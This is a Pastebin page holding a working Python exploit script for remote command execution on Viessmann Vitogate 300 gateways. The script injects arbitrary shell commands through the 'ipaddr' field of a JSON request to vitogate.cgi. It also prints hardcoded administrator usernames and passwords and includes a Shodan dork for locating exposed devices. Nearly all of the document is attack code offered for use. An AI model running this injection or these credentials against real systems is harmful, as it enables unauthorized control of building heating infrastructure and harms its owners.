API tools faq
paste
Advertisement
FlyFar

Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE) - CVE-2023-5702 & CVE-2023-5222

FlyFar
Mar 14th, 2024
803
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.48 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)
  2. #- Shodan Dork: http.title:'Vitogate 300'
  3. #- Exploit Author: ByteHunter
  4. #- Email: 0xByteHunter@proton.me
  5. #- Version: versions up to 2.1.3.0
  6. #- Tested on: 2.1.1.0
  7. #- CVE : CVE-2023-5702 & CVE-2023-5222
  8.  
  9.  
  10. import argparse
  11. import requests
  12.  
  13. def banner():
  14.     banner = """
  15.    ╔═══════════════════════════════════╗
  16.             CVE-2023-5702  
  17.           Vitogate 300 RCE
  18.           Author: ByteHunter      
  19.    ╚═══════════════════════════════════╝
  20.    """
  21.  
  22.     print(banner)
  23.  
  24.  
  25. def send_post_request(target_ip, command, target_port):
  26.     payload = {
  27.         "method": "put",
  28.         "form": "form-4-7",
  29.         "session": "",
  30.         "params": {
  31.             "ipaddr": f"1;{command}"
  32.         }
  33.     }
  34.  
  35.     headers = {
  36.         "Host": target_ip,
  37.         "Content-Length": str(len(str(payload))),
  38.         "Content-Type": "application/json"
  39.     }
  40.  
  41.     url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"
  42.  
  43.  
  44.     response = requests.post(url, json=payload, headers=headers)
  45.  
  46.     if response.status_code == 200:
  47.         print("Result:")
  48.         print(response.text)
  49.     else:
  50.         print(f"Request failed! status code: {response.status_code}")
  51.  
  52. def main():
  53.     parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")
  54.     parser.add_argument("--target", required=False, help="Target IP address")
  55.     parser.add_argument("--port", required=False, help="Target port",default="80")
  56.     parser.add_argument("--command", required=False, help="Command")
  57.     parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")
  58.  
  59.     args = parser.parse_args()
  60.  
  61.     if args.creds:
  62.         print("Vitogate 300 hardcoded administrative accounts credentials")
  63.         print("Username: vitomaster, Password: viessmann1917")
  64.         print("Username: vitogate, Password: viessmann")
  65.     else:
  66.         target_ip = args.target
  67.         target_port = args.port
  68.         command = args.command
  69.  
  70.         if not (target_ip and command):
  71.             print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")
  72.             return
  73.  
  74.         send_post_request(target_ip, command,target_port)
  75.  
  76. if __name__ == "__main__":
  77.     banner()
  78.     main()
  79.            
Tags: Exploit CVE Vulnerability RCE Viessmaan Viessmaan Vitogate
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!